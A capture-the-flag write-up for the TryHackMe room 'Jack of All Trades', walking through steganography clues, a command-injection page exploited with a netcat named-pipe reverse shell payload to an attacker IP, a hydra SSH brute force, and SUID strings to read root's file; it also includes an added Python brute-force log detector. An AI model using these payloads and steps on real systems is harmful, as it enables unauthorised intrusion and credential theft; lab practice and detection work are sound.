TryHackMe: Jack of All Trades
Jack of All Trades is a fun room. I barely looked at any write-ups, just to check if my instincts were right, so I consider it not directly looking at one. I love doing CTFs, it really is amazing.
https://tryhackme.com/room/jackofalltrades
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- 10.10.153.98
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 14:32 GMT
Nmap scan report for 10.10.153.98
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Jack-of-all-trades!
|_http-server-header: Apache/2.4.10 (Debian)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.32 seconds
We see that the services are switched, and trying to access port 22 we get an error with Firefox:
It's normal for Firefox to block these types of ports, so to get around this we just have to configure Firefox to allow port 22 to be accessed. To do so we go to about:config and search for network.security.ports.banned.override:
After that we select String and write 22:
Web 22
And now we should be able to access port 22:
Nothing much to see at first, but in the source code we find an encoded text and a directory:
We see that it's encoded with Base64, so we go to CyberChef and get the following:
We get a password but nowhere to use it yet, so we go to the other directory we found, /recovery.php:
A login form that we can't really use for now, but just like before the source code had some interesting things:
It's an encoded text again, so we throw it into CyberChef. This one was more complex, but after some research we were able to get the message:
The message contained a link with a hint, and going to it gave us a Wikipedia page:
Since the credentials were inside the homepage we went to check again and found a file in /assets/ with a similar name to the Wikipedia page:
With this we could only assume that there are files hidden inside the image, so we download it and use steghide with the only password we were able to get so far:
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf stego.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
And we got a text file with the following inside:
Hehe. Gotcha!
You're on the right path, but wrong image!
Wrong image! So we download the other images from the /assets/ directory and try to extract with the same password. jackinthebox.jpg didn't work but header.jpg did:
┌──(kali㉿kali)-[~/Desktop]
└─$ steghide extract -sf header.jpg
Enter passphrase:
wrote extracted data to "cms.creds".
And it gave us the credentials to log into recovery.php:
Here you go Jack. Good thing you thought ahead!
Username: jackinthebox
Password: TplFxiSHjY
After we log in we get the following page:
First instinct was to add ?cmd= to the current page, and luckily enough it worked:
Shell as www-data
From here we could get a reverse shell to have more control. First step is to start our listener with nc -lvnp 4444, next we enter the payload in the cmd parameter:
http://10.10.153.98:22/nnxhweOV/index.php?cmd=mknod%20/tmp/backpipe%20p;%20/bin/sh%200%3C/tmp/backpipe%20|%20nc%2010.23.58.75%204444%20%3E/tmp/backpipe
And we are inside:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.23.58.75] from (UNKNOWN) [10.10.153.98] 49348
whoami
www-data
Shell as jack
Looking around we find that inside the /home directory there's a file called jacks_password_list:
pwd
/home
ls -la
total 16
drwxr-xr-x 3 root root 4096 Feb 29 2020 .
drwxr-xr-x 23 root root 4096 Feb 29 2020 ..
drwxr-x--- 3 jack jack 4096 Feb 29 2020 jack
-rw-r--r-- 1 root root 408 Feb 29 2020 jacks_password_list
cat jacks_password_list
*hclqAzj+2GC+=0K
eN<A@n^zI?FE$I5,
X<(@zo2XrEN)#MGC
,,aE1K,nW3Os,afb
ITMJpGGIqg1jn?>@
0HguX{,fgXPE;8yF
sjRUb4*@pz<*ZITu
[8V7o^gl(Gjt5[WB
yTq0jI$d}Ka<T}PD
Sc.[[2pL<>e)vC4}
9;}#q*,A4wd{<X.T
M41nrFt#PcV=(3%p
GZx.t)H$&awU;SO<
.MVettz]a;&Z;cAC
2fh%i9Pr5YiYIf51
TDF@mdEd3ZQ(]hBO
v]XBmwAk8vk5t3EF
9iYZeZGQGG9&W4d1
8TIFce;KjrBWTAY^
SeUAwt7EB#fY&+yt
n.FZvJ.x9sYe5s5d
8lN{)g32PG,1?[pM
z@e1PmlmQ%k5sDz@
ow5APF>6r,y4krSo
We know that jack is a user and we have a list of possible passwords for him, so all we have to do now is use hydra and get the working password:
┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -l jack -P list 10.10.153.98 ssh -s 80
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-10 15:14:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
[DATA] attacking ssh://10.10.153.98:80/
[80][ssh] host: 10.10.153.98 login: jack password: ITMJpGGIqg1jn?>@
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-10 15:14:59
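From the defender's side, a run like the one above leaves a very recognisable trace in sshd's auth log: a burst of failed logins for one user from one source address within seconds, and here followed by a successful login. The following detection is an added example, not part of the original write-up; the log lines are constructed to mirror the hydra run (the year is assumed, since syslog timestamps carry none).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth.log lines modelled on the hydra run above: a burst of
# failures for one user from one source, then a success. Not from the target.
SAMPLE_AUTH_LOG = """\
Feb 10 15:14:55 jack-of-all-trades sshd[1201]: Failed password for jack from 10.23.58.75 port 40211 ssh2
Feb 10 15:14:55 jack-of-all-trades sshd[1202]: Failed password for jack from 10.23.58.75 port 40212 ssh2
Feb 10 15:14:56 jack-of-all-trades sshd[1203]: Failed password for jack from 10.23.58.75 port 40213 ssh2
Feb 10 15:14:56 jack-of-all-trades sshd[1204]: Failed password for jack from 10.23.58.75 port 40214 ssh2
Feb 10 15:14:57 jack-of-all-trades sshd[1205]: Failed password for jack from 10.23.58.75 port 40215 ssh2
Feb 10 15:14:59 jack-of-all-trades sshd[1206]: Accepted password for jack from 10.23.58.75 port 40216 ssh2
Feb 10 15:20:01 jack-of-all-trades sshd[1300]: Failed password for jack from 192.0.2.10 port 51000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_ts(ts, year=2025):
    """Syslog timestamps carry no year; assume one (the constructed sample is 2025)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return [(ip, user, failures_in_window, success_afterwards)] for each
    (ip, user) pair that reaches `threshold` failed logins within `window_seconds`."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[(m["ip"], m["user"])].append((parse_ts(m["ts"]), m["result"]))
    findings = []
    for (ip, user), evs in events.items():
        evs.sort()
        fails = [t for t, r in evs if r == "Failed"]
        for i, start in enumerate(fails):
            in_window = [t for t in fails[i:] if (t - start).total_seconds() <= window_seconds]
            if len(in_window) >= threshold:
                # a success right after the burst is the case that needs an immediate response
                success = any(r == "Accepted" and t >= start for t, r in evs)
                findings.append((ip, user, len(in_window), success))
                break
    return findings
```

The single failure from 192.0.2.10 stays below the threshold, so only the burst from 10.23.58.75 is reported, flagged as having ended in a valid login.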
Now with the password we log into ssh, and when doing ls we find an image:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh jack@10.10.153.98 -p 80
jack@10.10.153.98's password:
jack@jack-of-all-trades:~$ ls
user.jpg
To download it we go to our machine and use the scp command:
┌──(kali㉿kali)-[~/Desktop]
└─$ scp -P 80 jack@10.10.153.98:~/user.jpg .
jack@10.10.153.98's password:
user.jpg 100% 286KB 877.0KB/s 00:00
All we had to do was open the image and the user flag was there:
Next step is to get root flag so we start enumerating.
Looking at the binaries we see that strings has the SUID bit set:
jack@jack-of-all-trades:/$ find / -type f -perm -04000 -ls 2>/dev/null
135127 456 -rwsr-xr-x 1 root root 464904 Mar 22 2015 /usr/lib/openssh/ssh-keysign
134730 288 -rwsr-xr-- 1 root messagebus 294512 Feb 9 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135137 12 -rwsr-xr-x 1 root root 10248 Apr 15 2015 /usr/lib/pt_chown
132828 44 -rwsr-xr-x 1 root root 44464 Nov 20 2014 /usr/bin/chsh
132795 56 -rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
132826 56 -rwsr-xr-x 1 root root 53616 Nov 20 2014 /usr/bin/chfn
133088 40 -rwsr-xr-x 1 root root 39912 Nov 20 2014 /usr/bin/newgrp
133270 28 -rwsr-x--- 1 root dev 27536 Feb 25 2015 /usr/bin/strings
133273 148 -rwsr-xr-x 1 root root 149568 Mar 12 2015 /usr/bin/sudo
133111 56 -rwsr-xr-x 1 root root 54192 Nov 20 2014 /usr/bin/passwd
132940 76 -rwsr-xr-x 1 root root 75376 Nov 20 2014 /usr/bin/gpasswd
133161 88 -rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
138022 3052 -rwsr-xr-x 1 root root 3124160 Feb 17 2015 /usr/sbin/exim4
85 40 -rwsr-xr-x 1 root root 40000 Mar 29 2015 /bin/mount
131 28 -rwsr-xr-x 1 root root 27416 Mar 29 2015 /bin/umount
114 40 -rwsr-xr-x 1 root root 40168 Nov 20 2014 /bin/su
This means that we can read any file we want, and following the hint we just have to do:
jack@jack-of-all-trades:/$ strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{REDACTED}